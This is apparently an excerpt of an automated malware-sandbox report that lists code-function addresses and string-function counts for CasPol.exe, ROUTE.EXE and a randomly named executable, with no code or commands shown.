Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00416AD0	5_2_00416AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00416AD3	5_2_00416AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00401AE4	5_2_00401AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0040E2F3	5_2_0040E2F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_00410313	5_2_00410313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0040E443	5_2_0040E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0040E437	5_2_0040E437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0040E528	5_2_0040E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0042EF93	5_2_0042EF93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_004017A2	5_2_004017A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019E01AA	5_2_019E01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D41A2	5_2_019D41A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D81CC	5_2_019D81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019BA118	5_2_019BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01910100	5_2_01910100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019A8158	5_2_019A8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019B2000	5_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0192E3F0	5_2_0192E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019E03E6	5_2_019E03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DA352	5_2_019DA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019A02C0	5_2_019A02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019C0274	5_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019E0591	5_2_019E0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01920535	5_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019CE4F6	5_2_019CE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019C4420	5_2_019C4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D2446	5_2_019D2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0191C7C0	5_2_0191C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01944750	5_2_01944750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01920770	5_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0193C6E0	5_2_0193C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019229A0	5_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019EA9A6	5_2_019EA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01936962	5_2_01936962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019068B8	5_2_019068B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0194E8F0	5_2_0194E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01922840	5_2_01922840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0192A840	5_2_0192A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D6BD7	5_2_019D6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DAB40	5_2_019DAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0191EA80	5_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01938DBF	5_2_01938DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0191ADE0	5_2_0191ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019BCD1F	5_2_019BCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0192AD00	5_2_0192AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019C0CB5	5_2_019C0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01910CF2	5_2_01910CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01920C00	5_2_01920C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0199EFA0	5_2_0199EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01912FC8	5_2_01912FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01940F30	5_2_01940F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019C2F30	5_2_019C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01962F28	5_2_01962F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01994F40	5_2_01994F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01932E90	5_2_01932E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DCE93	5_2_019DCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DEEDB	5_2_019DEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DEE26	5_2_019DEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01920E59	5_2_01920E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0192B1B0	5_2_0192B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0190F172	5_2_0190F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019EB16B	5_2_019EB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0195516C	5_2_0195516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019CF0CC	5_2_019CF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019270C0	5_2_019270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D70E9	5_2_019D70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DF0E0	5_2_019DF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0196739A	5_2_0196739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D132D	5_2_019D132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0190D34C	5_2_0190D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019252A0	5_2_019252A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0193B2C0	5_2_0193B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0193D2F0	5_2_0193D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019C12ED	5_2_019C12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019BD5B0	5_2_019BD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019E95C3	5_2_019E95C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D7571	5_2_019D7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DF43F	5_2_019DF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01911460	5_2_01911460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DF7B0	5_2_019DF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D16CC	5_2_019D16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01965630	5_2_01965630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019B5910	5_2_019B5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01929950	5_2_01929950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0193B950	5_2_0193B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019238E0	5_2_019238E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0198D800	5_2_0198D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0193FB80	5_2_0193FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01995BF0	5_2_01995BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0195DBF9	5_2_0195DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DFB76	5_2_019DFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01965AA0	5_2_01965AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019BDAAC	5_2_019BDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019C1AA3	5_2_019C1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019CDAC6	5_2_019CDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DFA49	5_2_019DFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D7A46	5_2_019D7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01993A6C	5_2_01993A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_0193FDC0	5_2_0193FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D1D5A	5_2_019D1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01923D40	5_2_01923D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019D7D73	5_2_019D7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DFCF2	5_2_019DFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01999C32	5_2_01999C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01921F92	5_2_01921F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DFFB1	5_2_019DFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_018E3FD5	5_2_018E3FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_018E3FD2	5_2_018E3FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_019DFF09	5_2_019DFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 5_2_01929EB0	5_2_01929EB0
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043D8F5E	9_2_043D8F5E
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043F9C48	9_2_043F9C48
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043DADA8	9_2_043DADA8
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043E3588	9_2_043E3588
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043D8FA8	9_2_043D8FA8
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043E1788	9_2_043E1788
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043E1785	9_2_043E1785
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043DAFC8	9_2_043DAFC8
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043D90F8	9_2_043D90F8
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043D90EC	9_2_043D90EC
Source: C:\Program Files (x86)\RxwSdyGqeltXeoYzhpIHTizrhyytYVYTkxsVCiTaHxOK\SrZjbK9j4QXGHBZ.exe	Code function: 9_2_043D91DD	9_2_043D91DD
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EF02C0	10_2_02EF02C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F10274	10_2_02F10274
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F303E6	10_2_02F303E6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E7E3F0	10_2_02E7E3F0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2A352	10_2_02F2A352
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F02000	10_2_02F02000
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F281CC	10_2_02F281CC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F241A2	10_2_02F241A2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F301AA	10_2_02F301AA
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EF8158	10_2_02EF8158
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E60100	10_2_02E60100
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F0A118	10_2_02F0A118
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E8C6E0	10_2_02E8C6E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E6C7C0	10_2_02E6C7C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E70770	10_2_02E70770
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E94750	10_2_02E94750
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F1E4F6	10_2_02F1E4F6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F22446	10_2_02F22446
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F14420	10_2_02F14420
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F30591	10_2_02F30591
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E70535	10_2_02E70535
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E6EA80	10_2_02E6EA80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F26BD7	10_2_02F26BD7
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2AB40	10_2_02F2AB40
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E9E8F0	10_2_02E9E8F0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E568B8	10_2_02E568B8
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E72840	10_2_02E72840
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E7A840	10_2_02E7A840
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E729A0	10_2_02E729A0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F3A9A6	10_2_02F3A9A6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E86962	10_2_02E86962
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2EEDB	10_2_02F2EEDB
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2CE93	10_2_02F2CE93
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E82E90	10_2_02E82E90
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E70E59	10_2_02E70E59
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2EE26	10_2_02F2EE26
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E62FC8	10_2_02E62FC8
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EEEFA0	10_2_02EEEFA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EE4F40	10_2_02EE4F40
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F12F30	10_2_02F12F30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EB2F28	10_2_02EB2F28
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E90F30	10_2_02E90F30
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E60CF2	10_2_02E60CF2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F10CB5	10_2_02F10CB5
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E70C00	10_2_02E70C00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E6ADE0	10_2_02E6ADE0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E88DBF	10_2_02E88DBF
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E7AD00	10_2_02E7AD00
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F0CD1F	10_2_02F0CD1F
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E8D2F0	10_2_02E8D2F0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F112ED	10_2_02F112ED
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E8B2C0	10_2_02E8B2C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E752A0	10_2_02E752A0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EB739A	10_2_02EB739A
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E5D34C	10_2_02E5D34C
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2132D	10_2_02F2132D
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2F0E0	10_2_02F2F0E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F270E9	10_2_02F270E9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E770C0	10_2_02E770C0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F1F0CC	10_2_02F1F0CC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E7B1B0	10_2_02E7B1B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EA516C	10_2_02EA516C
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E5F172	10_2_02E5F172
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F3B16B	10_2_02F3B16B
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F216CC	10_2_02F216CC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EB5630	10_2_02EB5630
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2F7B0	10_2_02F2F7B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E61460	10_2_02E61460
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2F43F	10_2_02F2F43F
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F395C3	10_2_02F395C3
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F0D5B0	10_2_02F0D5B0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F27571	10_2_02F27571
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F1DAC6	10_2_02F1DAC6
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EB5AA0	10_2_02EB5AA0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F11AA3	10_2_02F11AA3
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F0DAAC	10_2_02F0DAAC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EE3A6C	10_2_02EE3A6C
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F27A46	10_2_02F27A46
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2FA49	10_2_02F2FA49
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EADBF9	10_2_02EADBF9
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EE5BF0	10_2_02EE5BF0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E8FB80	10_2_02E8FB80
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2FB76	10_2_02F2FB76
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E738E0	10_2_02E738E0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EDD800	10_2_02EDD800
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E79950	10_2_02E79950
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E8B950	10_2_02E8B950
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F05910	10_2_02F05910
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E79EB0	10_2_02E79EB0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E33FD2	10_2_02E33FD2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E33FD5	10_2_02E33FD5
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2FFB1	10_2_02F2FFB1
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E71F92	10_2_02E71F92
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2FF09	10_2_02F2FF09
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F2FCF2	10_2_02F2FCF2
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02EE9C32	10_2_02EE9C32
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E8FDC0	10_2_02E8FDC0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F27D73	10_2_02F27D73
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02E73D40	10_2_02E73D40
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02F21D5A	10_2_02F21D5A
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026F1D90	10_2_026F1D90
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026EAE70	10_2_026EAE70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026ECE90	10_2_026ECE90
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026EAFC0	10_2_026EAFC0
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026EAFB4	10_2_026EAFB4
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026ECC70	10_2_026ECC70
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026EB0A5	10_2_026EB0A5
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026F364D	10_2_026F364D
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026F3650	10_2_026F3650
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_026F5450	10_2_026F5450
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_0270BB10	10_2_0270BB10
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1E2A3	10_2_02D1E2A3
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1E184	10_2_02D1E184
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1E63D	10_2_02D1E63D
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1D708	10_2_02D1D708
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1E40B	10_2_02D1E40B
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1C9D3	10_2_02D1C9D3
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1C984	10_2_02D1C984
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 10_2_02D1C9A4	10_2_02D1C9A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 01955130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 01967E54 appears 107 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 0198EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 0199F290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 0190B970 appears 262 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 02EB7E54 appears 107 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 02EEF290 appears 103 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 02EA5130 appears 58 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 02EDEA12 appears 86 times
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: String function: 02E5B970 appears 262 times

